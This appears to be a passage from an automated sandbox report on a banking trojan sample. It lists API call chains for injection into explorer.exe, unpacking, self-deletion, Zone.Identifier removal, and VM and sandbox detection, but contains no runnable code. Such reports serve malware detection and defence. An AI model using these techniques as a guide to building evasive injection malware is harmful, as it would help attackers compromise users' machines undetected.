                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_009D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,12_2_009D1016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_009D1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,12_2_009D1819
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_009D1A80 NtCreateSection,NtMapViewOfSection,12_2_009D1A80
                Source: C:\Windows\explorer.exeCode function: 13_2_00F4355C RtlAllocateHeap,NtUnmapViewOfSection,13_2_00F4355C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A1EBE RtlMoveMemory,NtUnmapViewOfSection,14_2_003A1EBE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_031D1016 WSAStartup,RtlMoveMemory,NtUnmapViewOfSection,15_2_031D1016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_007D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,16_2_007D1016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_007D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_007D18BF
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_007D1B26 NtCreateSection,NtMapViewOfSection,16_2_007D1B26
                Source: C:\Windows\explorer.exeCode function: 17_2_00AD370C RtlAllocateHeap,NtUnmapViewOfSection,17_2_00AD370C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_005726A9 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,20_2_005726A9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00571C58 NtCreateSection,NtMapViewOfSection,20_2_00571C58
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00571CEF OpenProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_00571CEF
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: jdggfai.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: file.exeVirustotal: Detection: 33%
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jdggfai C:\Users\user\AppData\Roaming\jdggfai
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jdggfaiJump to behavior
                Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@20/3@29/1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE3BEA wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,10_2_00CE3BEA
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\cas-rih_casur\velinimuc luzotumez14.pdb source: file.exe, jdggfai.1.dr
                Source: Binary string: bC:\cas-rih_casur\velinimuc luzotumez14.pdb0f source: file.exe, jdggfai.1.dr

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\jdggfaiUnpacked PE file: 9.2.jdggfai.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE4F87 push esp; iretd 10_2_00CE4F88
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE9265 push BD6C6D74h; retf 10_2_00CE9275
                Source: C:\Windows\explorer.exeCode function: 11_2_00D114D4 push esi; ret 11_2_00D114D6
                Source: C:\Windows\explorer.exeCode function: 11_2_00D17197 push esp; iretd 11_2_00D17198
                Source: C:\Windows\explorer.exeCode function: 11_2_00D161A0 push eax; retf 11_2_00D161A1
                Source: C:\Windows\explorer.exeCode function: 11_2_00D11405 push esi; ret 11_2_00D11407
                Source: C:\Windows\explorer.exeCode function: 11_2_00D1C877 push edi; ret 11_2_00D1C878
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_009D3417 push esp; iretd 12_2_009D3418
                Source: C:\Windows\explorer.exeCode function: 13_2_00F414D4 push esi; ret 13_2_00F414D6
                Source: C:\Windows\explorer.exeCode function: 13_2_00F445A7 push esp; iretd 13_2_00F445A8
                Source: C:\Windows\explorer.exeCode function: 13_2_00F41405 push esi; ret 13_2_00F41407
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A8EB5 push ecx; ret 14_2_003A8EC8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003C598F push ebp; retf 14_2_003C59A7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_031D3527 push esp; iretd 15_2_031D3528
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_007D3627 push esp; iretd 16_2_007D3628
                Source: C:\Windows\explorer.exeCode function: 17_2_00AD1405 push esi; ret 17_2_00AD1407
                Source: C:\Windows\explorer.exeCode function: 17_2_00AD14D4 push esi; ret 17_2_00AD14D6
                Source: C:\Windows\explorer.exeCode function: 17_2_00ADAC8D push esp; iretd 17_2_00ADAC95
                Source: C:\Windows\explorer.exeCode function: 17_2_00ADAAD2 push ebp; iretd 17_2_00ADAAD3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_005743C7 push esp; iretd 20_2_005743C8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00578DD2 push ebp; ret 20_2_00578E1E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_005793AB push FFFFFFFFh; retf 20_2_005793AD
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,10_2_00CE1FA1
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jdggfaiJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jdggfaiJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jdggfai:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE38EA GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,10_2_00CE38EA
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking mutex)
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_12-840
                Contains functionality to compare user and computer (likely to detect sandboxes)
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,10_2_00CE38EA
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_15-1046
                Source: C:\Windows\explorer.exe TID: 5336Thread sleep count: 650 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4564Thread sleep count: 311 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4564Thread sleep time: -31100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4536Thread sleep count: 330 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4536Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4388Thread sleep count: 505 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4540Thread sleep count: 225 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1868Thread sleep count: 233 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1368Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1368Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3896Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3896Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1840Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1840Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 3196Thread sleep count: 327 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 3196Thread sleep time: -196200000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 3196Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2308Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2308Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4164Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4164Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 4728Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4728Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 860Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 860Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,10_2_00CE16C7
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_14-8055
                Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 650Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 505Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 7.7 %
                Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.4 %
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,10_2_00CE14D8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,10_2_00CE13FE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,10_2_00CE15BE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,14_2_003A1939
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A1936 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,FindNextFileW,FindClose,14_2_003A1936
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A217C FindFirstFileW,FindNextFileW,FindClose,14_2_003A217C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,14_2_003A1FFD
                Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,14_2_003A1B5B
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end nodegraph_14-8057
                Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end node
                Source: explorer.exe, 00000001.00000000.323049259.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000001.00000000.294853901.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.323241922.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
                Source: explorer.exe, 00000001.00000003.301318590.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.262570544.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000003.301318590.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
